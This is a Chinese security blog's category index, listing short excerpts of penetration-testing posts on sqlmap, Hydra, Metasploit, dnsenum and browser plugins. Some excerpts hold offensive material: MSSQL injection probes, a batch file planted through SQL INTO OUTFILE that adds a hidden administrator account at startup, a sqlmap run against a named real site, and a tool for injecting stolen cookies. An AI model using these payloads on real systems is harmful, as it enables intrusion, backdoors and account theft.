随笔分类 -  安全

摘要:收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,欢迎接楼补充、分享。TIP1当我们注射的时候,判断注入 http://site/script?id=10http://site/script?id=11-1# 相当于 id=10http://site/s... 阅读全文
posted @ 2015-05-14 21:36 vigarbuaa 阅读(357) 评论(0) 推荐(0)
摘要:netstat -n | awk ‘/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}’TIME_WAIT 8947FIN_WAIT1 15FIN_WAIT2 1ESTABLISHED 55SYN_RECV 21CLOSING 2LAST_ACK 4T... 阅读全文
posted @ 2015-03-06 09:02 vigarbuaa 阅读(2153) 评论(0) 推荐(0)
摘要:http://www.freebuf.com/articles/web/5511.html 阅读全文
posted @ 2014-05-15 14:11 vigarbuaa 阅读(318) 评论(0) 推荐(0)
摘要:http://www.offensive-security.com/metasploit-unleashed/Port_Scanninghttp://blog.csdn.net/dong976209075/article/details/7771159http://nmap.org/book/idlescan.html 阅读全文
posted @ 2014-01-05 22:43 vigarbuaa 阅读(256) 评论(0) 推荐(0)
摘要:渗透测试任务中,主机/服务/漏洞等信息如果手动维护,会带来巨大的工作量。在metasploit中,这部分工作已经被封装的非常好,每次调用内部模块执行的任务结果都会自动存入DB.通过简单的指令即可以方便的查看。metasploit 中的DB操作msf > help databaseDatabase Backend Commands========================= Command Description ------- ----------- creds List all credentials in the dat... 阅读全文
posted @ 2014-01-05 22:04 vigarbuaa 阅读(794) 评论(0) 推荐(0)
摘要:http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.htmlhttps://www.thc.org/thc-hydra/语法# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]server service [OPT]-R 继续从上一次进度接着破解-S 大写,采用SSL链接 -s 小写,可通过这个参数 阅读全文
posted @ 2013-12-27 22:42 vigarbuaa 阅读(760) 评论(0) 推荐(0)
摘要:普通linux机器下可以用netstat -anp | grep pid即可。 solaris下则不同,可以借助pfiles工具,pfiles $pid | grep sockpfiles 26640 | grep sock sockname: AF_INET 10.0.2.91 port: 58731 sockname: AF_INET 0.0.0.0 port: 28491 sockname: AF_INET 10.0.2.91 port: 58732 sockname: AF_INET 10.0.2.91 port: ... 阅读全文
posted @ 2013-12-24 09:48 vigarbuaa 阅读(1397) 评论(0) 推荐(0)
摘要:dnsenum的目的是尽可能收集一个域的信息,它能够通过谷歌或者字典件猜测可能存在的域名,以及对一个网段进行反向查询。它可以查询网站的主机地址信息、域名服务器、mx record(函件交换记录),在域名服务器上执行axfr请求,通过google脚本得到扩展域名信息(google hacking),提取自域名并查询,计算C类地址并执行whois询,执行反向查询,把地址段写入文件。从其中还是可以得到不少好玩的信息,例如:wooyun 是建立在sinaapp上的root@kali:~/Desktop/crypt# dnsenum --enum www.wooyun.orgdnsenum.pl VER 阅读全文
posted @ 2013-12-20 22:57 vigarbuaa 阅读(1736) 评论(0) 推荐(0)
摘要:http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html安装手册http://www.aldeid.com/wiki/Thc-hydra使用说明http://resources.infosecinstitute.com/online-dictionary-attack-with-hydra/ 阅读全文
posted @ 2013-12-17 23:28 vigarbuaa 阅读(811) 评论(0) 推荐(0)
摘要:http://blog.lifeibo.com/blog/2011/07/07/200-long-connection.htmlhttp://jmeter.apache.org/https://github.com/wangbin579/gryphon 阅读全文
posted @ 2013-12-14 13:36 vigarbuaa 阅读(225) 评论(0) 推荐(0)
摘要:转自evilcos的博客看到那么多苦逼的跨站师在问Cookie利用工具,不忍心,还是把自己写的Chrome扩展开源出来吧,功能极简,仿造《我的渗透利器》里提到的Original Cookie Injector for Greasemonkey。效果在Chrome下按alt+c快捷键打开如下图:然后把你盗来的Cookies,直接贴进文本框里,上面的域名输入框会自动取你当前所在的页面的域名,可以自己随便改,小技巧tip:改为根域能达到意想不到的效果:)这个扩展会把你的Cookies都变为本地持久Cookies。点击“Inject Cookies”即可。源码:https://github.com/e 阅读全文
posted @ 2013-10-21 12:57 vigarbuaa 阅读(994) 评论(0) 推荐(0)
摘要:在Windows或者Linux下mysql安装后默认的密码为空,又当我们又安装了mysql的管理工具phpmyadmin后登陆时出现“空密码登陆呗禁止(参见允许密码为空)”。不能登录成功解决办法如下:1..要是你想用空密码,则将phpmyadmin下的config.inc.php(根目录)或者config.default.php(根目录)再则:libraries\config.default.php(友情提示,由于版本不一样可能涉及的文件不同,基本为这三个文件)中的$cfg['Servers'][$i]['AllowNoPassword'] = false;改为 阅读全文
posted @ 2013-10-16 22:26 vigarbuaa 阅读(222) 评论(0) 推荐(0)
摘要:and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(select @@servername) //本地服务名and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员and 1=(Select IS_MEMBER( 阅读全文
posted @ 2013-10-16 09:16 vigarbuaa 阅读(3961) 评论(0) 推荐(0)
摘要:1.批处理文件内容@echo off net user li 123456 /add net user li /active:yes net localgroup Administrators li /add 2.生成bat文件的SQL语句 SELECT * INTO OUTFILE 'C://Documents and Settings//Administrator//「开始」菜单//程序//启动//hacker.bat' FIELDS TERMINATED BY ' ' ENCLOSED BY ' ' ESCAPED BY '  阅读全文
posted @ 2013-09-16 14:38 vigarbuaa 阅读(275) 评论(0) 推荐(0)
摘要:firefox一直是各位渗透测试必备的利器,这里整理了34款Firefox插件和几款Chrome的插件,其中包含渗透测试、信息收集、代理、加密解密等功能。Firefox插件1:FirebugFirefox的五星级强力推荐插件之一,不许要多解释2:UserAgentSwitcher改变客户端的UserAgent的一款插件3:Hackbar91ri.org的攻城师们的必备工具,提供了SQL注入和XSS攻击,能够快速对字符串进行各种编码。4:HttpFox监测和分析浏览器与web服务器之间的HTTP流量5:LiveHTTPHeaders即时查看一个网站的HTTP头6:TamperData查看和修改H 阅读全文
posted @ 2013-07-29 22:00 vigarbuaa 阅读(1081) 评论(0) 推荐(0)
摘要:svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-s... 阅读全文
posted @ 2013-07-23 18:11 vigarbuaa 阅读(491) 评论(0) 推荐(0)
摘要:mysql> select @@version;+-----------+| @@version |+-----------+| 5.5.14 |+-----------+1 row in set (0.00 sec)mysql> select @@basedir;+------------------------------------------+| @@basedir |+------------------------------------------+| C:/Program Files/MySQL/MySQL S... 阅读全文
posted @ 2013-07-23 16:51 vigarbuaa 阅读(254) 评论(0) 推荐(1)
摘要:1. XMapp下载好,安装于C:盘下2. 根据readme中的揭开,首先执行setup_xmapp。3. 单击xampp_start, 不报错则继续4. 在browser中访问localhost,此时可以看到xmapp的欢迎界面5. 修改$XAMPP_HOME\apache\conf\extra\httpd-xampp.conf文件,注释掉如下# Order deny,allow# Deny from all# Allow from 127.0.0.0/8# ErrorDocument 403 /error/HTTP_XAMPP_FORBIDDEN.html.var#6. 用$XAMPP_H 阅读全文
posted @ 2013-07-22 13:51 vigarbuaa 阅读(1495) 评论(0) 推荐(0)
摘要:这篇文章是一个朋友写的,但是他不让说他是谁,就替他保密一下了。这篇文章看起来很像软文,但是文章中介绍的还挺详细,不要把他当成软文来读就行了。作者:XXX我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的技术和经验也不断提高,在渗透过程中收集了大大小小的工具一堆,都快把自己的U盘放满了,当然,随着时代和技术的进步,很多工具也相应的过时了,但是却很少去删掉,看着那些熟悉的图标,熟悉的界面,就好象看到了自己一步步成长的过程,这其中有很多是自己的作品,看着那些逐渐从丑陋过渡到简陋再过渡到精美的软件界面,呵呵,这其中的滋味,真的很感慨。由于脚本是我自己的弱项,于是这些年收集 阅读全文
posted @ 2013-06-29 23:47 vigarbuaa 阅读(501) 评论(0) 推荐(0)
摘要:Web安全测试时经常会遇到一些蹩脚的注射点,而因各种原因利用注射又无法获取网站管理账号或拥有网站管理权限却迟迟不能upload一个shell的时候,可能会权衡一下web权限与数据库信息,哪个是我们所需要的。当需要的仅为数据库某个表的数据,如会员信息,而我们又没有得到数据库管理权限,无法直接导出数据,可以考虑利用注入逐个暴出数据导出,这里分享的小方法便是利用burp使得这个过程简单化。像检测到注入后使用穿山甲,sqlmap等dump数据库信息时,毕竟有诸多限制。穿山甲可以逐条跑,但是程序容易崩溃。至于sqlmap,个人使用时感觉有时速度不佳,而burp则解决这个问题。以本地搭建环境为例,注射点为 阅读全文
posted @ 2013-06-29 23:29 vigarbuaa 阅读(410) 评论(0) 推荐(0)